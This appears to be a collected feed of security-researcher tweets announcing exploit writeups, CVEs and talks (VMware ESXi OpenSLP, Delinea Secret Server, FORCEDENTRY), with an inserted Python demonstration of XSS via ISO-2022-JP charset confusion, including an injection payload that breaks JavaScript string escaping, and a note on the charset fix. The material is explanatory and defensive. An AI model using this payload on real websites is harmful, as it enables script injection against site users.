Here is my RCE exploit code and writeup for (CVE-2021-21974) VMware ESXi OpenSLP heap-overflow discovered by @_wmliang_. Thank you again for your write-up.
[PoC] https://t.co/MCf3TV6IjH
[writeup] https://t.co/LoKlsYVyAJ
My good friend @darkfloyd1014 and his crew will be hosting the VXcon security conference https://t.co/oIVUDegfT9 in Hong Kong 🇭🇰 this year. It will be packed with great talks. Security enthusiasts in the Asia Pacific area should go check it out.
I recently developed and posted about a technique called "First sequence sync", expanding @albinowax's single packet attack.
This technique allowed me to send 10,000 requests in 166ms, which breaks the packet size limitation of the single packet attack.
https://t.co/puM7hZWIlE
🔥 XSS on any website with missing charset information? 😳
Attackers may leverage the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in our latest blog post:
https://t.co/Ji3V0fK5b6
#appsec #security #vulnerability
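The mechanism behind that post, as an added example (not code from the tweet or from the linked blog post): ISO-2022-JP is a stateful encoding in which the escape sequence ESC ( J switches to JIS X 0201 Roman, where byte 0x5C decodes to the yen sign (U+00A5) instead of a backslash and 0x7E to an overline (U+203E). If a page carries no charset declaration and the browser ends up decoding it as ISO-2022-JP, a server-side backslash that was meant to escape a quote inside a JavaScript string literal silently stops being an escape. The page template, the `js_string_escape` helper, the payload and the `demo` function below are all constructed for illustration; the decoding is done with Python's `iso2022_jp` codec, standing in for the browser's decoder.

```python
# Added example: why a missing charset lets ISO-2022-JP escape sequences break
# JavaScript string escaping. The web app, its escaping routine and the payload
# are hypothetical; the codec behaviour (ESC ( J -> JIS X 0201 Roman, where
# 0x5C is U+00A5) is what the attack depends on.

ESC_JIS_ROMAN = "\x1b(J"   # switch G0 to JIS X 0201 Roman
ESC_ASCII = "\x1b(B"       # switch G0 back to ASCII


def js_string_escape(s: str) -> str:
    """Typical server-side escaping for a double-quoted JS string literal.
    It is correct as long as the browser sees 0x5C as a backslash."""
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("</", "<\\/")


def render_page(user_input: str) -> bytes:
    """Constructed page: reflects user input into a JS string literal and,
    crucially, declares no charset (no <meta charset>, no Content-Type charset)."""
    html = (
        "<html><head><title>demo</title></head><body>\n"
        '<script>var q = "' + js_string_escape(user_input) + '";</script>\n'
        "</body></html>\n"
    )
    # latin-1 keeps the ESC byte (0x1b) and all ASCII bytes unchanged.
    return html.encode("latin-1")


def script_body(decoded_page: str) -> str:
    """Extract the inline script from the decoded page."""
    start = decoded_page.index("<script>") + len("<script>")
    end = decoded_page.index("</script>")
    return decoded_page[start:end]


def code_after_literal(js: str) -> str:
    """Return the JS source that follows the first double-quoted string literal,
    honouring backslash escapes the way a JS parser does. Whatever comes back
    here is what the engine would execute as code, not as string data."""
    i = js.index('"') + 1
    while i < len(js):
        c = js[i]
        if c == "\\":
            i += 2          # escaped character: skip it
            continue
        if c == '"':
            return js[i + 1:].strip()
        i += 1
    raise ValueError("unterminated string literal")


def demo(user_input: str, charset: str) -> str:
    """Render the page with the given input, decode it the way a browser using
    `charset` would, and report what ends up outside the string literal."""
    page = render_page(user_input)
    return code_after_literal(script_body(page.decode(charset)))


# Attacker-controlled value: an ESC ( J sequence followed by a quote, a
# statement and a line comment. The server dutifully escapes the quote.
PAYLOAD = ESC_JIS_ROMAN + '" ; alert(1) //'


if __name__ == "__main__":
    # Decoded as UTF-8 the escaping holds: only the trailing ';' is code.
    print(repr(demo(PAYLOAD, "utf-8")))        # ';'
    # Decoded as ISO-2022-JP the backslash became a yen sign, so the injected
    # quote terminates the literal and alert(1) is live JavaScript.
    print(repr(demo(PAYLOAD, "iso2022_jp")))   # '; alert(1) //";'
    # Without the escape sequence the same escaping is fine under either charset.
    print(repr(demo('plain " query', "iso2022_jp")))  # ';'
```

The fix is not better escaping but removing the ambiguity: send an explicit charset (`Content-Type: text/html; charset=utf-8` and/or `<meta charset="utf-8">` early in the document) so the browser never has to guess the encoding from the content.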
The Delinea Secret Server auth bypass vulnerability I discovered earlier this year, that can net access to all stored secrets, has just been assigned CVE-2024-33891. Relive the story - https://t.co/9H0LzYAsh4
CVE-2024-33891 Delinea Secret Server before 11.7.000001 allows attackers to bypass authentication via the SOAP API in SecretServer/webservices/SSWebService.asmx. This is related to … https://t.co/zl8KFoVgh4
Here is my writeup and PoC for the AuthN/AuthZ bypass vulnerability in Delinea Secret Server I found some time ago. The patch is available, go update.
[Write up/PoC] - https://t.co/9H0LzYAsh4
[Patch Information] - https://t.co/vmuZiNupG8
[Vendor Update] - https://t.co/cpsrc0ST4L
Last year, Brandon and Ali went looking for new attack surface area in Microsoft Exchange. Ultimately, they were able to crash the Exchange file scanner by simply sending an email. Read more on our blog: https://t.co/a2srsBGLIm
Unfortunately I have to reshare this as I'm still looking for a position.
Had several good initial opportunities but in a lot of cases they were looking for someone less senior and not a web app SME.
If your company is hiring specifically web app testers, please DM me.
Here are the slides from the "Attacking JavaScript Engines in 2022" talk by @itszn13 and myself @offensive_con. It's a high-level talk about JS, JIT, various bug classes, and typical exploitation flows but with lots of references for further digging! https://t.co/DtHsLa34Da
- Use-after-frees from JIT
- CodeQL for variant analysis
- Never-before-seen exploit primitives
- Tenured heap tomfoolery
I’ve packed just about everything in this post!
CVE-2021-34425 The Zoom Client for Meetings before version 5.7.3 (for Android, iOS, Linux, macOS, and Windows) contains a server-side request forgery vulnerability in the chat's "link preview" functionality. In versions prior to 5.7.3, if a user we... https://t.co/LyjBxH8j6w
Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists, activists and dissidents around the world. https://t.co/RYsqpTHF5j
Just watched "Practical HTTP Header Smuggling: Sneaking Past Reverse Proxies to Attack AWS and Beyond" - must-read research by @intruder_io's Daniel Thatcher
https://t.co/KJTnPwGOAe
✨ New Workshop! Android Exploits 101 🔥📱
I put together an introductory overview of the "shape" of modern 0-day exploit chains for Android. Hope it's helpful 😊
https://t.co/MQGHsgMpTs
Here's a cool project I've been working on during my boring intro CS classes! It's heaptrace, a heap debugger that replaces addresses with symbols to help you understand a program's heap operations.
https://t.co/VMpCVbaaRd